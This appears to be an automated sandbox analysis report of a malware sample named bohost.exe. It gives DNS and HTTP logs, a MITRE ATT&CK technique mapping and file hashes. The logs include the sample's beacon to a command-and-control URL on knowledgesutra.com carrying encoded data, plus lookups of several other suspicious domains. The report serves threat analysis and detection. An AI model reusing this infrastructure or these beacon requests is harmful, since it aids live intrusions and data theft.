                                                                                      mpki-ocsp.edge.digicert.com
                                                                                      mpki-ocsp.edge.digicert.com
                                                                                      IN CNAME
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      IN CNAME
                                                                                      e3782.cd.akamaiedge.net
                                                                                      e3782.cd.akamaiedge.net
                                                                                      IN A
                                                                                      104.78.173.45
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-ocsp.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/ocsp-response
                                                                                      Content-Length: 5
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=253
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.ce3e1202.1737297717.425063d0
                                                                                      Server-Timing: ak_p; desc="1737297717060_34750158_1112564688_16_857_48_0_-";dur=1
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Accept: */*
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-ocsp.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/ocsp-response
                                                                                      Content-Length: 5
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=253
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.ce3e1202.1737297717.425063d3
                                                                                      Server-Timing: ak_p; desc="1737297717114_34750158_1112564691_11_1171_48_0_-";dur=1
                                                                                    • flag-us
                                                                                      DNS
                                                                                      evcs-crl.ws.symantec.com
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      evcs-crl.ws.symantec.com
                                                                                      IN A
                                                                                      Response
                                                                                      evcs-crl.ws.symantec.com
                                                                                      IN CNAME
                                                                                      crl-symcprod.digicert.com
                                                                                      crl-symcprod.digicert.com
                                                                                      IN CNAME
                                                                                      mpki-crl.edge.digicert.com
                                                                                      mpki-crl.edge.digicert.com
                                                                                      IN CNAME
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      IN CNAME
                                                                                      e3782.cd.akamaiedge.net
                                                                                      e3782.cd.akamaiedge.net
                                                                                      IN A
                                                                                      104.78.173.45
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-crl.ws.symantec.com/evcs.crl
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /evcs.crl HTTP/1.1
                                                                                      Cache-Control: max-age = 3600
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      If-Modified-Since: Mon, 07 Oct 2024 08:46:45 GMT
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-crl.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/pkix-crl
                                                                                      Content-Length: 1824
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=921
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.da3e1202.1737297717.1e24ddf1
                                                                                      Server-Timing: ak_p; desc="1737297717272_34750170_505732593_12_867_48_0_-";dur=1
                                                                                    • flag-us
                                                                                      DNS
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      IN PTR
                                                                                      a23-51-98-7deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      a104-78-173-45deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      knowledgesutra.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      Response
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      3.33.130.190
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      15.197.148.33
                                                                                    • flag-us
                                                                                      GET
                                                                                      http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      3.33.130.190:80
                                                                                      Request
                                                                                      GET /img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq HTTP/1.0
                                                                                      Connection: close
                                                                                      Host: knowledgesutra.com
                                                                                      Accept: */*
                                                                                      User-Agent: chrome/9.0
                                                                                      Response
                                                                                      HTTP/1.0 200 OK
                                                                                      content-type: text/html
                                                                                      date: Sun, 19 Jan 2025 14:41:58 GMT
                                                                                      content-length: 387
                                                                                    • flag-us
                                                                                      DNS
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2aa9ff50de748dbeawsglobalacceleratorcom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      webhomefordomains.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      webhomefordomains.com
                                                                                      IN A
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      ourthreedomains.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      ourthreedomains.com
                                                                                      IN A
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      166.190.18.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      166.190.18.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      166.190.18.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-18-190-166deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      seeworldonlines.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      seeworldonlines.com
                                                                                      IN A
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      8.153.16.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      8.153.16.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      8.153.16.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-16-153-8deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      www.google.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      www.google.com
                                                                                      IN A
                                                                                      Response
                                                                                      www.google.com
                                                                                      IN A
                                                                                      142.250.187.196
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://www.google.com/
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      142.250.187.196:80
                                                                                      Request
                                                                                      GET / HTTP/1.0
                                                                                      Connection: close
                                                                                      Host: www.google.com
                                                                                      Accept: */*
                                                                                      Response
                                                                                      HTTP/1.0 302 Found
                                                                                      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPKetLwGIjA2WjlgNJW1mtJsKIkDCxl4NE0LrT3VuBhE8kSdHQjEarFpS88lSNA4UkptdE0wTo0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                      x-hallmonitor-challenge: CgwI8p60vAYQvOHa_wISBLXXsFM
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-q6HCG90AWRpE1bvjwcA-KQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                      Date: Sun, 19 Jan 2025 14:42:58 GMT
                                                                                      Server: gws
                                                                                      Content-Length: 396
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Set-Cookie: AEC=AZ6Zc-XyUpj_dvAH0RTVDCoET4uLw9oMdAvCAm80jdd3kdCK00qdiial_w; expires=Fri, 18-Jul-2025 14:42:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                    • flag-us
                                                                                      DNS
                                                                                      196.187.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      196.187.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      196.187.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s33-in-f41e100net
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://www.google.com/
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      142.250.187.196:80
                                                                                      Request
                                                                                      GET / HTTP/1.1
                                                                                      Connection: close
                                                                                      Pragma: no-cache
                                                                                      Host: www.google.com
                                                                                      Response
                                                                                      HTTP/1.1 302 Found
                                                                                      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                      x-hallmonitor-challenge: CgwI8560vAYQ98uKhQESBLXXsFM
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-KndAstvJzPzcv59_l5FtMw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                      Date: Sun, 19 Jan 2025 14:42:59 GMT
                                                                                      Server: gws
                                                                                      Content-Length: 396
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Set-Cookie: AEC=AZ6Zc-Xw0m-1n8eUk_K7FVHRxURyPhtiwjgvRxqa17AGpcaaPxB6J0CRyAk; expires=Fri, 18-Jul-2025 14:42:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                      Connection: close
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      142.250.187.196:80
                                                                                      Request
                                                                                      GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                      Connection: close
                                                                                      Pragma: no-cache
                                                                                      Host: www.google.com
                                                                                      Response
                                                                                      HTTP/1.1 429 Too Many Requests
                                                                                      Date: Sun, 19 Jan 2025 14:42:59 GMT
                                                                                      Pragma: no-cache
                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Content-Type: text/html
                                                                                      Server: HTTP server (unknown)
                                                                                      Content-Length: 3086
                                                                                      X-XSS-Protection: 0
                                                                                      Connection: close
                                                                                    • flag-us
                                                                                      DNS
                                                                                      21.236.111.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      21.236.111.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      199.111.78.13.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      199.111.78.13.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • 104.78.173.45:80
                                                                                      http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
                                                                                      http
                                                                                      843 B
                                                                                       1.2kB
                                                                                       7
                                                                                      6

                                                                                      HTTP Request

                                                                                      GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.78.173.45:80
                                                                                      http://evcs-crl.ws.symantec.com/evcs.crl
                                                                                      http
                                                                                      490 B
                                                                                       2.5kB
                                                                                       6
                                                                                      6

                                                                                      HTTP Request

                                                                                      GET http://evcs-crl.ws.symantec.com/evcs.crl

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 3.33.130.190:80
                                                                                      http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq
                                                                                      http
                                                                                      bohost.exe
                                                                                      664 B
                                                                                       741 B
                                                                                       6
                                                                                      6

                                                                                      HTTP Request

                                                                                      GET http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 127.0.0.1:58323
                                                                                    • 127.0.0.1:58323
                                                                                      explorer.exe
                                                                                    • 142.250.187.196:80
                                                                                      http://www.google.com/
                                                                                      http
                                                                                      bohost.exe
                                                                                      302 B
                                                                                       1.5kB
                                                                                       5
                                                                                      5

                                                                                      HTTP Request

                                                                                      GET http://www.google.com/

                                                                                      HTTP Response

                                                                                      302
                                                                                    • 142.250.187.196:80
                                                                                      http://www.google.com/
                                                                                      http
                                                                                      bohost.exe
                                                                                      307 B
                                                                                       1.5kB
                                                                                       5
                                                                                      5

                                                                                      HTTP Request

                                                                                      GET http://www.google.com/

                                                                                      HTTP Response

                                                                                      302
                                                                                    • 142.250.187.196:80
                                                                                      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                      http
                                                                                      bohost.exe
                                                                                      526 B
                                                                                       3.7kB
                                                                                       6
                                                                                      7

                                                                                      HTTP Request

                                                                                      GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                                                                      HTTP Response

                                                                                      429
                                                                                    • 127.0.0.1:58323
                                                                                    • 127.0.0.1:58323
                                                                                    • 127.0.0.1:58323
                                                                                      bohost.exe
                                                                                    • 127.0.0.1:58323
                                                                                      bohost.exe
                                                                                    • 8.8.8.8:53
                                                                                      104.219.191.52.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                       147 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      104.219.191.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      71.31.126.40.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                       157 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      71.31.126.40.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                       139 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      167.173.78.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                       159 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      228.249.119.40.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      dns
                                                                                      71 B
                                                                                       230 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      evcs-ocsp.ws.symantec.com

                                                                                      DNS Response

                                                                                      104.78.173.45

                                                                                    • 8.8.8.8:53
                                                                                      evcs-crl.ws.symantec.com
                                                                                      dns
                                                                                      70 B
                                                                                       231 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      evcs-crl.ws.symantec.com

                                                                                      DNS Response

                                                                                      104.78.173.45

                                                                                    • 8.8.8.8:53
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      dns
                                                                                      69 B
                                                                                       131 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      7.98.51.23.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                       137 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      45.173.78.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      knowledgesutra.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      64 B
                                                                                       96 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      knowledgesutra.com

                                                                                      DNS Response

                                                                                      3.33.130.190
                                                                                      15.197.148.33

                                                                                    • 8.8.8.8:53
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                       127 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      190.130.33.3.in-addr.arpa

                                                                                    • 224.0.0.251:5353
                                                                                      112 B
                                                                                       2
                                                                                    • 8.8.8.8:53
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                       158 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      154.239.44.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      webhomefordomains.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      67 B
                                                                                       140 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      webhomefordomains.com

                                                                                    • 8.8.8.8:53
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                       157 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      56.163.245.4.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                       146 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      15.164.165.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      ourthreedomains.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      65 B
                                                                                       138 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      ourthreedomains.com

                                                                                    • 8.8.8.8:53
                                                                                      166.190.18.2.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                       135 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      166.190.18.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      seeworldonlines.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      65 B
                                                                                       138 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      seeworldonlines.com

                                                                                    • 8.8.8.8:53
                                                                                      8.153.16.2.in-addr.arpa
                                                                                      dns
                                                                                      69 B
                                                                                       131 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      8.153.16.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      www.google.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      60 B
                                                                                       76 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      www.google.com

                                                                                      DNS Response

                                                                                      142.250.187.196

                                                                                    • 8.8.8.8:53
                                                                                      196.187.250.142.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                       112 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      196.187.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      21.236.111.52.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                       158 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      21.236.111.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      199.111.78.13.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                       146 B
                                                                                       1
                                                                                      1

                                                                                      DNS Request

                                                                                      199.111.78.13.in-addr.arpa

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Reconnaissance

                                                                                    Resource Development

                                                                                    Initial Access

                                                                                    Execution

                                                                                    Persistence

                                                                                    Boot or Logon Autostart Execution

                                                                                    2
                                                                                    T1547

                                                                                    Active Setup

                                                                                    1
                                                                                    T1547.014

                                                                                    Registry Run Keys / Startup Folder

                                                                                    1
                                                                                    T1547.001

                                                                                    Create or Modify System Process

                                                                                    1
                                                                                    T1543

                                                                                    Windows Service

                                                                                    1
                                                                                    T1543.003

                                                                                    Privilege Escalation

                                                                                    Boot or Logon Autostart Execution

                                                                                    2
                                                                                    T1547

                                                                                    Active Setup

                                                                                    1
                                                                                    T1547.014

                                                                                    Registry Run Keys / Startup Folder

                                                                                    1
                                                                                    T1547.001

                                                                                    Create or Modify System Process

                                                                                    1
                                                                                    T1543

                                                                                    Windows Service

                                                                                    1
                                                                                    T1543.003

                                                                                    Defense Evasion

                                                                                    Hide Artifacts

                                                                                    1
                                                                                    T1564

                                                                                    Hidden Files and Directories

                                                                                    1
                                                                                    T1564.001

                                                                                    Modify Registry

                                                                                    6
                                                                                    T1112

                                                                                    Credential Access

                                                                                    Discovery

                                                                                    Peripheral Device Discovery

                                                                                    3
                                                                                    T1120

                                                                                    Process Discovery

                                                                                    1
                                                                                    T1057

                                                                                    Query Registry

                                                                                    5
                                                                                    T1012

                                                                                    System Information Discovery

                                                                                    5
                                                                                    T1082

                                                                                    System Location Discovery

                                                                                    1
                                                                                    T1614

                                                                                    System Language Discovery

                                                                                    1
                                                                                    T1614.001

                                                                                    Lateral Movement

                                                                                    Collection

                                                                                    Command and Control

                                                                                    Exfiltration

                                                                                    Impact

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                      Filesize

                                                                                      471B

                                                                                      MD5

                                                                                      959d2a9c777132fe5498a165d5bbaaf7

                                                                                      SHA1

                                                                                      5cd8dd5a857fd362647a22ec0732207888f29bb9

                                                                                      SHA256

                                                                                      8bf88caa748bd496eb1290b073a40bc4d595a64ee5be59bd001826c5ec9befba

                                                                                      SHA512

                                                                                      66b2f65cb3ca7bf905aea846fc34ed6b818174438f4277114784162ed0b2e8bd18b54f195847ee765889750e8ddb903615367d71dbe0a12cc28cf1f07bcca923

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                      Filesize

                                                                                      412B

                                                                                      MD5

                                                                                      331df4ccaa91f3bffdd4c68fe9e778e3

                                                                                      SHA1

                                                                                      2a19e0fe77eecc2b145a02f74e7bf22c0ef9be6f

                                                                                      SHA256

                                                                                      0aa0fcd49aba096669030e35de6a68a26d4b9d6d7d7a9ec0ddb27d4c7319be04

                                                                                      SHA512

